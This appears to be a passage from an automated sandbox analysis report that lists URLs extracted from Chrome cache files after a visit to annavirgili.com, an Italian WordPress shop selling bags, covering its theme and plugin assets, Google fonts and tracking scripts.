        Source: chromecache_296.1.dr, chromecache_312.1.drString found in binary or memory: http://stackoverflow.com/questions/814613/how-to-read-get-data-from-a-url-using-javascript
        Source: chromecache_313.1.dr, chromecache_307.1.drString found in binary or memory: http://stackoverflow.com/questions/9229645/remove-duplicates-from-javascript-array
        Source: chromecache_456.1.dr, chromecache_422.1.dr, chromecache_401.1.drString found in binary or memory: http://swiperjs.com
        Source: chromecache_437.1.dr, chromecache_471.1.drString found in binary or memory: http://tizen.org/system/tizenid
        Source: chromecache_336.1.dr, chromecache_334.1.drString found in binary or memory: http://wicky.nillia.ms/headroom.js
        Source: chromecache_308.1.dr, chromecache_283.1.drString found in binary or memory: http://www.github.com/mattbryson
        Source: chromecache_386.1.dr, chromecache_418.1.drString found in binary or memory: http://www.gnu.org/licenses/gpl.html
        Source: chromecache_386.1.dr, chromecache_418.1.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
        Source: chromecache_437.1.dr, chromecache_471.1.drString found in binary or memory: https://abs.yandex.com/mapuid
        Source: chromecache_432.1.drString found in binary or memory: https://adservice.google.com/pagead/regclk?
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/about/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/av-401/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/bags/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/comments/feed/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/contatti/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/feed/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/franchising/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/monogram/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/my-account/?from_type=register
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/my-account/lost-password/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/pagamento-e-spedizioni-2/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/pagamento-e-spedizioni/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/portafogli/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/privacy-policy/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/resi-e-rimborsi/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/shop/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/store/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/trasparenza/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/whistleblowing/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-admin/admin-ajax.php
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.9.6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.9.6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=5.9.6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.6.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=3.6.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/preloaded-elements-handlers.min.j
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor-pro/assets/js/webpack-pro.runtime.min.js?ver=3.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?v
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/enjoy-instagram-instagram-responsive-images-gallery-and-c
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-addons.css?ver=1.0.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/css/fmtpl-menu.css?ver=1.0.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/js/fmtpl-addons.js?ver=1.0.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/css/bootstrap.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/js/bootstrap.m
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/en.png
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/it.png
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/gtranslate/js/base.js?ver=6.7.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/gtranslate/js/flags.js?ver=6.7.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/pixel-caffeine/build/frontend.js?ver=2.3.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.5.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.5.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.5.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=6.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.5.4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=3.3.0
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/by_featured/css/by_featur
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/by_featured/js/by_feature
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/color/css/html_types/colo
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/color/js/html_types/color
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/css/html_types/imag
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/image/js/html_types/image
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/labe
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/slider/css/html_types/sli
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/slider/js/html_types/slid
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-si
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/minus.svg
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/img/plus.svg
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ve
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.min.css?ver=
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=3.3.0
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/checkbox.js?ver
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/mselect.js?ver=
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=3.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.r
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.ra
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/plugins/toolti
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/css/tooltipster.bu
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/tooltip/js/tooltipster.bun
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/select2.css?ver=6.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=6.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=6.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver=0.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/price-slider.min.js?ver=6.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=6.6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.j
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-ui-touch-punch/jquery-ui-tou
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-s
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-v
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/plugins/wpforms-lite/assets/js/integrations/elementor/frontend.mi
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/css/body_color.css?ver=1.0.8
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/css/customize.css?ver=1.0.8
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/css/main_color.css?ver=1.0.8
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/css/theme.css?ver=1.0.8
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/js/headroom.js?ver=0.11.0
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/js/theme.js?ver=1.0.8
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.css?ver=1.2
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/vendors/js-offcanvas/js-offcanvas.pkgd.min.js
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.c
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.j
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/assets/vendors/swiper/swiper.css?ver=5.3.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/css/category_bg.css?ver
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/themes/ciena/inc/elementor/widgets/assets/js/fmtpl_theme_elemento
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2021/08/logo.png
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2021/09/logo.pnbianco.png
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2021/10/cropped-Progetto-senza-titolo-2021-10-27T000238.5
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2021/10/white.png);
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/03/LOGO-NEERO-X-SITO_Tavola-disegno-1-1.png
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Home-3-1-300x193.jpg
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Home-3-1.jpg
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-1000x
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-1024x
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-300x1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181-768x4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2022/10/Progetto-senza-titolo-2024-09-04T092536.181.png
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2024/09/Asset-1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2024/09/Asset-4
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2024/09/Asset-6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/2024/09/Banner-sezione-bags.jpg
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/elementor/css/global.css?ver=1709081757
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/elementor/css/post-336.css?ver=1709081758
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/elementor/css/post-403.css?ver=1709081757
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462574847.css?ver=1725434764
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462589213.css?ver=1733126350
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-content/uploads/fgcheck.min.js?ver=1.0
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.13.3
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/underscore.min.js?ver=1.13.7
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-includes/js/wp-util.min.js?ver=6.7.1
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-json/
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fannavirgili.com%2F
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fannavirgili.com%2F&#038;format=xm
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/wp-json/wp/v2/pages/8052462589213
        Source: chromecache_474.1.drString found in binary or memory: https://annavirgili.com/xmlrpc.php?rsd
        Source: chromecache_278.1.dr, chromecache_306.1.drString found in binary or memory: https://api.jqueryui.com/position/
        Source: chromecache_474.1.drString found in binary or memory: https://api.w.org/
        Source: chromecache_299.1.dr, chromecache_381.1.dr, chromecache_432.1.dr, chromecache_341.1.drString found in binary or memory: https://cct.google/taggy/agent.js
        Source: chromecache_338.1.dr, chromecache_263.1.drString found in binary or memory: https://cdn.gtranslate.net/flags/
        Source: chromecache_453.1.dr, chromecache_330.1.drString found in binary or memory: https://connect.facebook.net/
        Source: chromecache_474.1.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
        Source: chromecache_453.1.dr, chromecache_330.1.drString found in binary or memory: https://connect.facebook.net/log/fbevents_telemetry/
        Source: chromecache_336.1.dr, chromecache_334.1.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener
        Source: chromecache_300.1.dr, chromecache_260.1.drString found in binary or memory: https://fontawesome.com
        Source: chromecache_300.1.dr, chromecache_260.1.drString found in binary or memory: https://fontawesome.com/license/free
        Source: chromecache_474.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Mulish%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
        Source: chromecache_474.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Mulish%3A400%7C-apple-system%2C
        Source: chromecache_474.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
        Source: chromecache_474.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2jogaqRXBA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2johaqRXBA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2joiaqRXBA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2joraqRXBA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Pttg83HX_SGhgqk2jovaqQ.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk0AotcqA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk0QotcqA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk0gotcqA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk2wotcqA.woff2)
        Source: chromecache_457.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptvg83HX_SGhgqk3wot.woff2)
        Source: chromecache_419.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aOvG4w-.woff2)
        Source: chromecache_419.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aevGw.woff2)
        Source: chromecache_419.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aivG4w-.woff2)
        Source: chromecache_419.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8amvG4w-.woff2)
        Source: chromecache_419.1.drString found in binary or memory: https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aqvG4w-.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz0dL_nz.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz4dL_nz.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEz8dL_nz.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzAdLw.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzMdL_nz.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzQdL_nz.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOiCnqEu92Fr1Mu51QrEzwdL_nz.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc-CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc0CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc1CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc2CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc3CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc5CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51S7ACc6CsQ.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc-CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc0CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc1CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc2CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc3CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc5CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TLBCc6CsQ.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TjASc-CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TjASc0CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TjASc1CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TjASc2CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TjASc3CsTKlA.woff2)
        Source: chromecache_428.1.drString found in binary or memory: https://fonts.gstatic.com/s/roboto/v32/KFOjCnqEu92Fr1Mu51TjASc5CsTKlA.woff2)
